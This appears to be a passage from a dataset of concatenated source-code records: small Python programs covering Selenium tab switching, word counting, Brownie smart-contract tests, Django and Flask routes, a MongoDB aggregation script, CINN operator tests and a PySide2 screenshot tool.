","sub_path":"bert_pytorch/model/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"634830053","text":"# from selenium import webdriver\n# from selenium.webdriver import ActionChains\n# from selenium import webdriver\n#\n# browser = webdriver.Firefox()\n# url = 'https://www.zhihu.com/explore'\n# browser.get(url)\n# input = browser.find_element_by_class_name('zu-top-add-question')\n# print(input)\n#\n# print(input.text)\n# print(input.id)\n# print(input.location)\n# print(input.tag_name)\n# print(input.size)\n\n\n# import time\n# # from selenium import webdriver\n# # from selenium.common.exceptions import NoSuchElementException\n# #\n# # browser = webdriver.Firefox()\n# # url = 'http://www.runoob.com/try/try.php?filename=jqueryui-api-droppable'\n# # browser.get(url)\n# # browser.switch_to.frame('iframeResult')\n# # try:\n# #     logo = browser.find_element_by_class_name('logo')\n# # except NoSuchElementException:\n# #     print('NO LOGO')\n# # browser.switch_to.parent_frame()\n# # logo = browser.find_element_by_class_name('logo')\n# # print(logo)\n# # print(logo.text)\n\n\nimport time\nfrom selenium import webdriver\n\nbrowser = webdriver.Firefox()\nbrowser.get('https://www.baidu.com')\nbrowser.execute_script('window.open()')\nprint(browser.window_handles)\n# switch to the newly opened tab\nbrowser.switch_to.window(browser.window_handles[1])\nbrowser.get('https://www.taobao.com')\ntime.sleep(1)\n# switch back to the first tab\nbrowser.switch_to.window(browser.window_handles[0])\nbrowser.get('https://python.org')","sub_path":"WorksZhang/GT_0723/se_next.py","file_name":"se_next.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"418512816","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#########################################################\n# Author: Author\n#########################################################\n# File: quewords.py\n# Description: Lists each word and the number of times it\n# occurs, using defaultdict...\n\nfrom collections import defaultdict\nimport string\nimport sys\n\n# defaultdict creates a key with a default value whenever the key does not\n# exist yet; otherwise it behaves like a plain dict...\nwords = defaultdict(int)\nstrip = string.whitespace + string.punctuation + string.digits + \"\\\"'\"\nif len(sys.argv) < 2:\n\tprint(\"\\nUsage: {0} filename.txt\".format(sys.argv[0]))\nfor filename in sys.argv[1:]:\n\tfor line in open(filename):\n\t\tfor word in line.lower().split():\n\t\t\tword = word.strip(strip)  # strip the characters defined in `strip`\n\t\t\tif len(word) > 2:  # keep only words of at least three letters\n\t\t\t\t# every time a key is missing a new item is created;\n\t\t\t\t# if it already exists, its count is incremented by 1...\n\t\t\t\twords[word] += 1\nfor num,word in enumerate(sorted(words), start=1):\n\tprint(\"{2:<10}'{0:.<30}' occurs {1} times\".format(word, words[word],num))\n","sub_path":"cap03/quewords2.py","file_name":"quewords2.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"444658437","text":"import time\nimport pytest\nfrom brownie import PriceContract, network\nfrom scripts.helpful_scripts import LOCAL_BLOCKCHAIN_ENVIRONMENTS, get_account, get_contract\n\n\n@pytest.fixture\ndef deploy_price_contract(get_job_id, 
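    # NOTE: `get_job_id` and `chainlink_fee` are assumed to be pytest
    # fixtures defined elsewhere (e.g. in a conftest.py); pytest injects
    # them into this fixture by name.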
chainlink_fee):\n # Arrange / Act\n price_contract = PriceContract.deploy(\n get_contract(\"oracle\").address,\n get_job_id,\n chainlink_fee,\n get_contract(\"link_token\").address,\n get_contract(\"btc_usd_price_feed\").address,\n {\"from\": get_account()},\n )\n # Assert\n assert price_contract is not None\n return price_contract\n \n \ndef test_send_api_request_local(deploy_price_contract, chainlink_fee, get_data):\n # Arrange\n if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n pytest.skip(\"Only for local testing\")\n price_contract = deploy_price_contract\n get_contract(\"link_token\").transfer(\n price_contract.address, chainlink_fee * 2, {\"from\": get_account()}\n )\n # Act\n transaction_receipt = price_contract.requestPriceData({\"from\": get_account()})\n requestId = transaction_receipt.events[\"ChainlinkRequested\"][\"id\"]\n # Assert\n get_contract(\"oracle\").fulfillOracleRequest(requestId, get_data, {\"from\": get_account()})\n assert isinstance(price_contract.priceFeedGreater(), bool)\n\ndef test_send_api_request_testnet(deploy_price_contract, chainlink_fee):\n # Arrange\n if network.show_active() not in [\"kovan\", \"rinkeby\", \"mainnet\"]:\n pytest.skip(\"Only for local testing\")\n price_contract = deploy_price_contract\n get_contract(\"link_token\").transfer(\n price_contract.address, chainlink_fee * 2, {\"from\": get_account()}\n )\n # Act\n transaction = price_contract.requestPriceData({\"from\": get_account()})\n # Assert\n assert transaction is not None\n transaction.wait(2)\n time.sleep(35)\n assert isinstance(price_contract.priceFeedGreater(), bool)\n \ndef test_can_get_latest_price(get_job_id, chainlink_fee):\n # Arrange / Act\n price_contract = PriceContract.deploy(\n get_contract(\"oracle\").address,\n get_job_id,\n chainlink_fee,\n get_contract(\"link_token\").address,\n get_contract(\"btc_usd_price_feed\"),\n {\"from\": get_account()},\n )\n # price_contract = deploy_price_contract\n # Assert\n value = price_contract.getLatestPrice()\n assert isinstance(value, int)\n assert value > 0","sub_path":"tests/test_price_contract.py","file_name":"test_price_contract.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"582906314","text":"from django.conf.urls import url\n\nfrom .views import *\n\nurlpatterns = [\n\t# Remember, already have the subdirectory from the mama url file\n\n\turl(r'^corgi$', corgiwebsite, name = 'corgiwebsite'),\n\turl(r'^$', othersimplesamples, name = 'samples'),\n\turl(r'^zengarden$', zengarden, name = 'zengarden')\n\n\n]","sub_path":"portfoliowithdjango/portfolio/single_pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"103826836","text":"import numpy as np\nimport itertools\n\n\ndef fight(you, boss):\n \"\"\"run the fight to see who wins\"\"\"\n you_attack = you['damage'] - boss['armor']\n if you_attack < 1:\n you_attack = 1\n boss_attack = boss['damage'] - you['armor']\n if boss_attack < 1:\n boss_attack = 1\n boss_turns = np.ceil(you['hit']/boss_attack)\n you_turns = np.ceil(boss['hit']/you_attack)\n return you_turns <= boss_turns\n\n# input\nyou = {}\nboss = {}\nyou['hit'] = 100\nboss['hit'] = 100\nboss['damage'] = 8\nboss['armor'] = 2\n\nweapons = [(8, 4), (10, 5), (25, 6), (40, 7), (74, 8)]\narmors = [(13, 1), (31, 2), (53, 3), (75, 4), (102, 5), (0, 0)]\nrings_damage = [(25, 1), (50, 2), (100, 
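    # Each tuple here (and in weapons/armors above) reads (gold cost,
    # stat bonus); the (0, 0) entries model an empty equipment slot.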
3), (0, 0)]\nrings_armor = [(20, 1), (40, 2), (80, 3), (0, 0)]\n\nlowest = 100000\niterable = itertools.product(range(len(weapons)),\n range(len(armors)),\n range(len(rings_damage) + len(rings_armor)),\n range(len(rings_damage) + len(rings_armor)))\nfor weapon_id, armor_id, r1, r2 in iterable:\n if r1 == r2:\n continue\n cost = 0\n cost += weapons[weapon_id][0]\n you['damage'] = weapons[weapon_id][1]\n\n cost += armors[armor_id][0]\n you['armor'] = armors[armor_id][1]\n\n rings_ids = [r1, r2]\n for r in rings_ids:\n if r <= 3:\n cost += rings_damage[r][0]\n you['damage'] += rings_damage[r][1]\n else:\n cost += rings_armor[r % len(rings_damage)][0]\n you['armor'] += rings_armor[r % len(rings_damage)][1]\n\n if fight(you, boss) and cost < lowest:\n lowest = cost\n\nprint(lowest)\n","sub_path":"2015/21_01.py","file_name":"21_01.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"219970224","text":"import dml\nimport prov.model\nimport datetime\nimport uuid\nimport gpxpy.geo\nimport random\n\nclass getBusinessesByCategory(dml.Algorithm):\n\n def project(R, p):\n return [p(t) for t in R]\n\n def select(R, s):\n return [t for t in R if s(t)]\n\n def product(R, S):\n return [(t, u) for t in R for u in S]\n\n def aggregate(R, f):\n keys = {r[0] for r in R}\n return [(key, f([v for (k, v) in R if k == key])) for key in keys]\n\n\n contributor = 'vinwah'\n reads = ['vinwah.businesses']\n writes = ['vinwah.businessesByCategory']\n\n @staticmethod\n def execute(trial=False):\n\n startTime = datetime.datetime.now()\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('vinwah', 'vinwah')\n\n businesses = repo['vinwah.businesses']\n\n # 1) find representative categories\n #projection. 
format of businessesCategories is [[json]]\n p = lambda x: (x['categories'])\n businessesCategories = getBusinessesByCategory.project(businesses.find(), p)\n \n #make histogram over categories\n categories_hist = {}\n for categories in businessesCategories:\n for category in categories:\n if category['title'] in categories_hist:\n categories_hist[category['title']] += 1\n else:\n categories_hist[category['title']] = 1\n\n del businessesCategories\n #find the 10 highest scors\n top10scors = []\n for key in categories_hist:\n top10scors.append(categories_hist[key])\n\n top10scors = sorted(top10scors)[-10:]\n\n # find the 10 categories associated with highest scors\n top10categories = []\n for key in categories_hist:\n if categories_hist[key] in top10scors:\n top10categories.append(key)\n\n\n # 2) project businesses into (lat, long, representable category)\n # and remove all businesses that does not conform to a category\n\n #project only needed data\n p = lambda x: (x['coordinates']['latitude'], x['coordinates']['longitude'], x['categories'])\n B = getBusinessesByCategory.project(businesses.find(), p)\n\n #Flatten the data and select category to associate business with\n for i in range(len(B)):\n temp = []\n for c in B[i][2]:\n temp.append(c['title'])\n cat = \"\"\n for c in temp:\n if c in top10categories:\n cat = c\n break\n B[i] = (B[i][0], B[i][1], cat)\n\n # select non-null data \n s = lambda x: (x[2] != \"\")\n B = getBusinessesByCategory.select(B, s)\n\n\n # grup by category\n data = []\n for c in top10categories:\n s = lambda x: x[2] == c\n P = getBusinessesByCategory.select(B, s)\n temp = []\n for p in P:\n temp.append({'lat':p[0], 'long':p[1]})\n data.append({c: temp})\n\n\n repo.dropCollection('businessesByCategory')\n repo.createCollection('businessesByCategory')\n repo['vinwah.businessesByCategory'].insert_many(data)\n\n repo.logout()\n endTime = datetime.datetime.now()\n\n print('getBusinessesByCategory finished at:', endTime)\n\n return {\"start\": startTime, \"end\": endTime}\n\n @staticmethod\n def provenance(doc=prov.model.ProvDocument(), startTime=None, endTime=None):\n \"\"\"\n Create the provenance document describing everything happening\n in this script. 
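        It ties together the input collection (dat:businesses), this script
        acting as a software agent, and the derived dat:businessesByCategory
        entity.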
Each run of the script will generate a new\n document describing that invocation event.\n \"\"\"\n\n # Set up the database connection.\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('vinwah', 'vinwah')\n\n doc.add_namespace('alg', 'http://datamechanics.io/algorithm/vinwah#') # The scripts are in # format.\n doc.add_namespace('dat', 'http://datamechanics.io/data/vinwah#') # The data sets are in # format.\n doc.add_namespace('ont', 'http://datamechanics.io/ontology#') # 'Extension', 'DataResource', 'DataSet', 'Retrieval', 'Query', or 'Computation'.\n doc.add_namespace('log', 'http://datamechanics.io/log/') # The event log.\n\n this_script = doc.agent('alg:getBusinessesByCategory', {prov.model.PROV_TYPE: prov.model.PROV['SoftwareAgent'], 'ont:Extension': 'py'})\n\n resource = doc.entity('dat:businesses', {'prov:label': 'Businesses in Boston', prov.model.PROV_TYPE: 'ont:DataSet'})\n\n get = doc.activity('log:uuid' + str(uuid.uuid4()), startTime, endTime)\n\n doc.wasAssociatedWith(get, this_script)\n\n doc.usage(get, resource, startTime, None, {prov.model.PROV_TYPE: 'ont:Computation'})\n\n enti = doc.entity('dat:businessesByCategory', {prov.model.PROV_LABEL: 'Location of Businesses in Boston by top 10 categories', prov.model.PROV_TYPE: 'ont:DataSet'})\n doc.wasAttributedTo(enti, this_script)\n doc.wasGeneratedBy(enti, get, endTime)\n doc.wasDerivedFrom(enti, resource, get, get, get)\n\n repo.logout()\n\n return doc\n\n","sub_path":"vinwah/getBusinessesByCategory.py","file_name":"getBusinessesByCategory.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"419744771","text":"#!/usr/bin/env python3\nimport unittest\nimport cinn\nimport numpy as np\nfrom cinn import runtime\nfrom cinn import ir\nfrom cinn.poly import create_stages\nfrom cinn import lang\nfrom cinn import Target\nfrom cinn import pe\nfrom cinn.common import *\n\n\nclass TestPEElementwise(unittest.TestCase):\n def setUp(self):\n self.m = 32\n self.n = 32\n\n self.target = Target()\n self.target.arch = Target.Arch.X86\n self.target.bits = Target.Bit.k32\n self.target.os = Target.OS.Linux\n\n self.unary_data = []\n\n def test_unary(self):\n for (fn_name, pe_fn, np_fn, dtype) in [\n (\"exp\", pe.exp, np.exp, \"float32\"),\n # TODO(wenming2014) not numpy\n # (\"erf\", pe.erf, np.erf, \"float32\"),\n # (\"sqrt\", pe.sqrt, np.sqrt, \"float32\"),\n # RuntimeWarning: divide by zero encountered in log2\n # (\"log2\", pe.log2, np.log2, \"float32\"),\n # (\"log10\", pe.log10, np.log10, \"float32\"),\n (\"floor\", pe.floor, np.floor, \"float32\"),\n (\"ceil\", pe.ceil, np.ceil, \"float32\"),\n # (\"round\", pe.round, np.round, \"float32\"),\n (\"trunc\", pe.trunc, np.trunc, \"float32\"),\n (\"cos\", pe.cos, np.cos, \"float32\"),\n (\"cosh\", pe.cosh, np.cosh, \"float32\"),\n (\"tan\", pe.tan, np.tan, \"float32\"),\n (\"sin\", pe.sin, np.sin, \"float32\"),\n (\"sinh\", pe.sinh, np.sinh, \"float32\"),\n # TODO(wenming2014) begin not numpy\n # (\"acos\", pe.acos, np.acos, \"float32\"),\n # (\"acosh\", pe.acosh, np.acosh, \"float32\"),\n # (\"asin\", pe.asin, np.asin, \"float32\"),\n # (\"asinh\", pe.asinh, np.asinh, \"float32\"),\n # (\"atan\", pe.atan, np.atan, \"float32\"),\n # (\"atanh\", pe.atanh, np.atanh, \"float32\"),\n # TODO(wenming2014) end\n (\"isnan\", pe.isnan, np.isnan, \"float32\"),\n (\"tanh\", pe.tanh, np.tanh, \"float32\"),\n (\"isfinite\", pe.isfinite, np.isfinite, \"float32\"),\n (\"isinf\", pe.isinf, 
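            # Each entry is (op name, CINN PE function, NumPy reference
            # implementation, dtype); union_tester lowers and compiles the PE
            # op and checks its output against the NumPy reference.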
np.isinf, \"float32\"),\n (\"negative\", pe.negative, np.negative, \"float32\"),\n # (\"identity\", pe.identity, np.identity, \"float32\"),\n # TODO(wenming2014) int type\n # (\"logical_not\", pe.logical_not, np.logical_not, \"int32\"),\n # (\"bitwise_not\", pe.bitwise_not, np.bitwise_not, \"int32\"),\n # TODO(wenming2014) not numpy\n # (\"sigmoid\", pe.sigmoid, np.sigmoid, \"float32\"),\n (\"sign\", pe.sign, np.sign, \"float32\"),\n (\"abs\", pe.abs, np.abs, \"float32\"),\n # TODO(wenming2014) not numpy\n # (\"rsqrt\", pe.rsqrt, np.rsqrt, \"float32\"),\n ]:\n self.compiler = cinn.Compiler.create(self.target)\n self.union_tester(fn_name, pe_fn, np_fn, dtype)\n\n def union_tester(self, fn_name, cinn_fn, np_fn, dtype=\"float32\"):\n m, n = [ir.Expr(_) for _ in (\n self.m,\n self.n,\n )]\n x = lang.Placeholder(dtype, \"x\", [m, n])\n y = cinn_fn(x.to_tensor())\n\n func_name = \"test_\" + fn_name\n\n stages = create_stages([x.to_tensor(), y])\n func = lang.lower(func_name, stages, [x.to_tensor(), y])\n\n builder = lang.Module.Builder(\"elementwise_module\", self.target)\n builder.add_function(func)\n\n module = builder.build()\n self.compiler.build(module)\n\n fn = self.compiler.lookup(func_name)\n\n x_data, x_buf, out_buf, *args = self.create_data(dtype)\n fn(args)\n\n self.assertTrue(\n np.allclose(\n out_buf.numpy(),\n self.create_target_data(x_data, np_fn),\n atol=1e-4))\n\n def create_target_data(self, x_data, np_target_fn):\n return np_target_fn(x_data)\n\n def create_data(self, dtype):\n if not self.unary_data:\n x_data = np.around(\n np.random.randn(self.m, self.n).astype(dtype), 2)\n x = runtime.cinn_buffer_t(x_data, runtime.cinn_x86_device)\n out = runtime.cinn_buffer_t(\n np.zeros([self.m, self.n]).astype(dtype),\n runtime.cinn_x86_device)\n self.unary_data = [\n x_data, x, out,\n runtime.cinn_pod_value_t(x),\n runtime.cinn_pod_value_t(out)\n ]\n\n return self.unary_data\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"python/tests/test_pe_elementwise.py","file_name":"test_pe_elementwise.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"223564701","text":"import sys\nimport time\n\nimport PySide2\nfrom PySide2.QtCore import Qt, Signal, QRect, QPoint\nfrom PySide2.QtGui import QPalette, QGuiApplication, QPixmap, QBrush, QPainter, QPaintEvent, QCursor, QMouseEvent, QPen, \\\n QColor\nfrom PySide2.QtWidgets import QApplication, QWidget\n\nfrom util.img_tool import pix_add_blurry, draw_circle\n\n\nclass ScreenShotMainWidget(QWidget):\n # 绘画信号\n draw_signal = Signal(QPoint, QPoint)\n desktop_pix = None\n\n # 鼠标点击开始点\n mouse_start_x = 0\n mouse_start_y = 0\n\n # 鼠标移动点\n mouse_current_x = 0\n mouse_current_y = 0\n\n # 鼠标释放点\n mouse_end_x = 0\n mouse_end_y = 0\n\n # 开始截图标识\n startFlag = False\n # 正在截图标识\n doingFlag = False\n # 截图结束标识\n endFlag = False\n\n hasResult = False\n\n show_widget = None\n\n def __init__(self, parent=None, ):\n super(ScreenShotMainWidget, self).__init__(parent)\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.palette = QPalette()\n self.desk = QApplication.desktop()\n self.screen = self.desk.screenGeometry()\n self.show_widget = ScreenShotShowWidget(self)\n self.draw_signal.connect(self.show_widget.adjustGeometry)\n self.screenshot()\n\n # 按键监听\n def keyPressEvent(self, evt):\n if evt.key() == Qt.Key_F2:\n self.screenshot()\n if evt.key() == Qt.Key_Escape:\n QApplication.instance().quit()\n\n # 鼠标按下事件\n def mousePressEvent(self, e):\n 
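        # Record the drag origin in global screen coordinates; the selection
        # rectangle is later spanned between this point and the cursor
        # position reported by mouseMoveEvent.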
self.mouse_start_x = e.globalX()\n self.mouse_start_y = e.globalY()\n self.startFlag = True\n self.doingFlag = True\n self.endFlag = False\n # self.show_widget.show()\n\n # 鼠标移动事件\n def mouseMoveEvent(self, event: PySide2.QtGui.QMouseEvent):\n if self.startFlag & self.doingFlag:\n self.show_widget.show()\n self.mouse_current_x = event.globalX()\n self.mouse_current_y = event.globalY()\n pointTopLeft = QPoint(min(self.mouse_start_x, self.mouse_current_x),\n min(self.mouse_start_y, self.mouse_current_y))\n pointBottomRight = QPoint(max(self.mouse_start_x, self.mouse_current_x),\n max(self.mouse_start_y, self.mouse_current_y))\n self.draw_signal.emit(pointTopLeft, pointBottomRight)\n\n # 鼠标松开\n def mouseReleaseEvent(self, e):\n # 如果已经标记了开始\n if self.startFlag:\n # 开始截图标记置否\n self.startFlag = False\n self.doingFlag = False\n self.mouse_end_x = e.globalX()\n self.mouse_end_y = e.globalY()\n\n # 获取当前区域选择像素\n self.endFlag = False\n self.hasResult = True\n # # 识别完成的回调\n # self.setMouseTracking(False)\n # self.hide()\n\n def screenshot(self):\n self.hasResult = False\n # 对鼠标移动事件进行监听\n self.setMouseTracking(True)\n # 标识开始截图\n self.startFlag = True\n self.endFlag = False\n # 休眠0.3秒\n time.sleep(0.3)\n # 调整窗口大小 用于展示当前页面图\n self.setGeometry(0, 0, self.screen.width(), self.screen.height())\n # 截全屏\n self.desktop_pix = QPixmap(QGuiApplication.primaryScreen().grabWindow(0))\n self.blurry_pix = pix_add_blurry(self.desktop_pix, 0.3)\n\n # 设置画笔\n self.palette.setBrush(self.backgroundRole(), QBrush(self.blurry_pix))\n self.setPalette(self.palette)\n # 显示\n self.show()\n\n\nclass ScreenShotShowWidget(QWidget):\n main_widget = None\n\n def __init__(self, main_widget):\n super(ScreenShotShowWidget, self).__init__()\n self.main_widget = main_widget\n self.setUi()\n # 按键监听\n\n def keyPressEvent(self, evt):\n if evt.key() == Qt.Key_F2:\n self.screenshot()\n if evt.key() == Qt.Key_Escape:\n QApplication.instance().quit()\n\n def setUi(self):\n self.setWindowFlags(Qt.WindowStaysOnTopHint | Qt.FramelessWindowHint)\n print(\"hello\")\n\n def paintEvent(self, event: QPaintEvent):\n painter = QPainter(self)\n painter.drawPixmap(self.rect(), self.draw_desktop_pix(self.geometry()))\n self.draw_rect_image(self.geometry())\n\n def mousePressEvent(self, event: QMouseEvent):\n if event.button() == Qt.LeftButton:\n self.dragPosition = event.globalPos() - self.frameGeometry().topLeft()\n self.cursor = QCursor()\n self.cursor.setShape(Qt.SizeAllCursor)\n self.setCursor(self.cursor)\n\n def adjustGeometry(self, leftTop: QPoint, rightBottom: QPoint):\n self.setGeometry(QRect(leftTop, rightBottom))\n\n def mouseMoveEvent(self, event: QMouseEvent):\n self.move(event.globalPos() - self.dragPosition)\n self.update()\n\n def mouseReleaseEvent(self, event: QMouseEvent):\n if event.button() == Qt.LeftButton:\n self.move(event.globalPos() - self.dragPosition)\n self.cursor.setShape(Qt.ArrowCursor)\n self.setCursor(self.cursor)\n\n def draw_desktop_pix(self, rect: QRect):\n return self.main_widget.desktop_pix.copy(rect)\n\n def draw_rect_image(self, rect: QRect):\n paint = QPainter(self)\n paint.setPen(QPen(Qt.red, 3, Qt.SolidLine))\n # 画边框\n paint.drawRect(rect)\n draw_circle(5, rect.top(), rect.left(), QColor(Qt.white), QColor(Qt.red), self)\n draw_circle(5, rect.top(), rect.right(), QColor(Qt.white), QColor(Qt.red), self)\n draw_circle(5, rect.bottom(), rect.left(), QColor(Qt.white), QColor(Qt.red), self)\n draw_circle(5, rect.bottom(), rect.right(), QColor(Qt.white), QColor(Qt.red), self)\n\n\nif __name__ == '__main__':\n app = 
QApplication(sys.argv)\n widget = ScreenShotMainWidget()\n widget.show()\n sys.exit(app.exec_())\n","sub_path":"ScreenShotWidget.py","file_name":"ScreenShotWidget.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"295513466","text":"from collections import namedtuple\nfrom datetime import datetime, tzinfo\nfrom flask import Blueprint, render_template, session, redirect\nfrom flask.globals import request\nfrom flask.helpers import url_for\nfrom tupa.modules.services.data import ds\nfrom tupa.modules.helpers.decorators import sallitut_roolit\nfrom tupa.modules.helpers.forms import LisaysForm, MuokkausForm\n\nbp = Blueprint('joukkueet', __name__, url_prefix='/joukkueet')\n\nJoukkue = namedtuple('Joukkue', ['id', 'vanha_sarja', 'sarja', 'kilpailu', 'nimi', 'jasenet'])\n\n@bp.route('/listaa', methods=['GET', 'POST'])\n@sallitut_roolit(['perus', 'admin'])\ndef listaa():\n \"\"\" Reitti, jonka kautta listataan kaikkien kilpailujen tiedot \"\"\"\n\n # apufunktio, jota käytetään hakemaan rastileimausta vastaava koodi\n def koodinhakija(kilpailut):\n \"\"\" Palauttaa funktion, joka hakee kilpailun ja rastin id:n perusteella rastin koodin. \"\"\"\n def _hae_koodi(kilpailu_id, rasti_id) -> str:\n # haetaan rastin tiedot kilpailusta\n rasti = kilpailut[kilpailu_id]['rastit'].get(rasti_id)\n\n return rasti['koodi'] if rasti else \"Tuntematon\"\n return _hae_koodi\n\n kilpailut = _hae_kaikki_tiedot()\n\n # näytetään listaussivu\n return render_template('joukkueet/lista.html',\n kilpailut=kilpailut,\n hae_koodi = koodinhakija(kilpailut))\n\n\n\n@bp.route('/lisaa', methods=['GET', 'POST'])\n@sallitut_roolit(['perus', 'admin'])\ndef lisaa():\n \"\"\" Uuden joukkueen lisäämiseen käytettävä sivu \"\"\"\n\n kayttaja = session.get('kayttaja')\n kilpailut = _hae_kaikki_tiedot()\n\n # jos kilpailuja ei ole, ei uutta joukkuetta voida lisätä\n if len(kilpailut) == 0:\n return redirect(url_for('joukkueet.listaa'))\n\n if request.method == 'GET':\n # täytetään lomakkeen tiedot get pyynnön parametreilla jos ollaan vaihtamassa valittua kilpailua\n form = LisaysForm(request.args)\n else:\n form = LisaysForm()\n\n # lisätään haetut kilpailut vaihtoehdoiksi\n arr_kilpailut = [(id, kilpailu['nimi']) for id, kilpailu in kilpailut.items()]\n form.kilpailu.choices = arr_kilpailut\n\n # valitaan tarvittaessa ensimmäinen kilpailu valmiiksi\n if not form.kilpailu.data:\n form.kilpailu.data = arr_kilpailut[0][0] if len(arr_kilpailut) > 0 else None\n \n # lisätään kilpailuun kuuluvat sarjat vaihtoehdoiksi\n arr_sarjat = [(id, sarja['nimi']) for id, sarja in kilpailut[form.kilpailu.data]['sarjat'].items()]\n form.sarja.choices = arr_sarjat\n\n # valitaan tarvittaessa ensimmäinen kilpailun sarja valmiiksi\n # tämä tehdään vain get-metodille, jotta lomaketta lähetettäessä sarjaa ei talleneta vahingossa\n # väärään sarjaan jos käyttäjä onkin vaihtanut kilpailua ennen lomakkeen lähettämistä\n if request.method == 'GET':\n if not form.sarja.data or form.sarja.data not in kilpailut[form.kilpailu.data]['sarjat'].keys():\n form.sarja.data = arr_sarjat[0][0] if len(arr_sarjat) > 0 else None\n\n\n # tarkistetaan lomake\n if form.validate_on_submit():\n kilpailu_id = int(form.kilpailu.data)\n sarja_id = int(form.sarja.data)\n\n # koostetaan lomakkeen tiedot dictionaryyn\n joukkue_dict = {\n 'nimi': form.nimi.data,\n # poistetaan tyhjät jäsenkentät ja järjestetään jäsenet ennen lisäämistä\n 'jasenet': sorted([_field.data for _field in 
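            # (English gloss of the Finnish comment above:) drop empty member
            # fields and sort the remaining names before saving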
form.jasenet if _field.data != \"\"]),\n 'leimaukset': {},\n 'lisaaja': kayttaja.get('email')\n }\n\n # lisätään joukkueen tiedot kantaan ja uudelleenohjataan takaisin joukkuelistaukseen\n ds.lisaa_joukkue(joukkue_dict, sarja_id, kilpailu_id)\n return redirect(url_for('joukkueet.listaa'))\n\n # näytetään joukkueen lisäys/muokkauslomake lisäystilassa\n return render_template('joukkueet/form.html',\n form=form,\n mode='lisaa',\n action_url=url_for('joukkueet.lisaa'))\n\n\n\n@bp.route('/muokkaa', methods=['GET', 'POST'])\n@sallitut_roolit(['perus', 'admin'])\ndef muokkaa():\n \"\"\" Valitun joukkueen muokkaukseen käytettävä sivu \"\"\"\n\n kayttaja = session.get('kayttaja')\n valittu_kilpailu = session.get('kilpailu')\n\n # haetaan muokattavan joukkueen tiedot joko pyynnön parametreista tai lomakkeelta\n joukkue_id = request.args.get('id', request.form.get('id', type=int), type=int)\n vanha_sarja_id = request.args.get('sarja', request.form.get('vanha_sarja', type=int), type=int)\n kilpailu_id = request.args.get('kilpailu', request.form.get('kilpailu', type=int), type=int)\n\n joukkue = ds.hae_joukkue(joukkue_id, vanha_sarja_id, kilpailu_id)\n kilpailu = ds.hae_kilpailu(kilpailu_id)\n\n # varmistetaan että tietoja vastaava joukkue ja kilpailu löytyvät tietokannasta\n if not (joukkue and kilpailu):\n return render_template('error.html', message=\"Virheellinen tunniste\")\n\n # varmistetaan että käyttäjällä on oikeus muokata joukkuetta\n if (kayttaja['email'] != joukkue['lisaaja'] and\n not ('admin' in kayttaja['roolit'] and kilpailu_id == int(valittu_kilpailu))):\n return redirect(url_for('joukkueet.listaa'))\n\n # luodaan lomake täytettynä valitun joukkueen tiedoilla\n joukkue_obj = Joukkue(joukkue_id, vanha_sarja_id, vanha_sarja_id, kilpailu_id, joukkue['nimi'], joukkue['jasenet'])\n form = MuokkausForm(obj=joukkue_obj)\n \n # haetaan kilpailun sarjat\n arr_sarjat = [(sarja.key.id, sarja['nimi']) for sarja in ds.hae_sarjat(kilpailu_id)]\n form.sarja.choices = arr_sarjat\n\n # valitaan ensimmäinen sarja jos mitään ei ole vielä valittuna\n if not form.sarja.data:\n form.sarja.data = arr_sarjat[0][0] if len(arr_sarjat) > 0 else None\n\n # tarkistetaan lomake\n if form.validate_on_submit():\n\n # jos joukkue on valittu poistettavaksi, \n if form.poista.data:\n ds.poista_joukkue(joukkue_id, vanha_sarja_id, kilpailu_id)\n return redirect(url_for('joukkueet.listaa'))\n\n # koostetaan lomakkeen tiedot dictionaryyn\n joukkue_dict = {\n 'nimi': form.nimi.data,\n # poistetaan tyhjät jäsenkentät ja järjestetään jäsenten tiedot\n 'jasenet': sorted([_field.data for _field in form.jasenet if _field.data != \"\"])\n }\n\n # päivitetään joukkueen tiedot kantaan ja uudelleenohjataan takaisin joukkuelistaukseen\n sarja_id = form.sarja.data\n if vanha_sarja_id == sarja_id:\n # jos sarja ei ole vaihtunut, tehdään päivitys suoraan\n ds.paivita_joukkue(joukkue_dict, joukkue_id, vanha_sarja_id, kilpailu_id)\n else:\n # jos sarja on vaihdettu, pitää joukkueen avain luoda uusiksi, joka tehdään poistamalla joukkue ja lisäämällä uusi\n # nyt joukkueen id vaihtuu, joka voi rikkoa toiminallisuutta jos esim. 
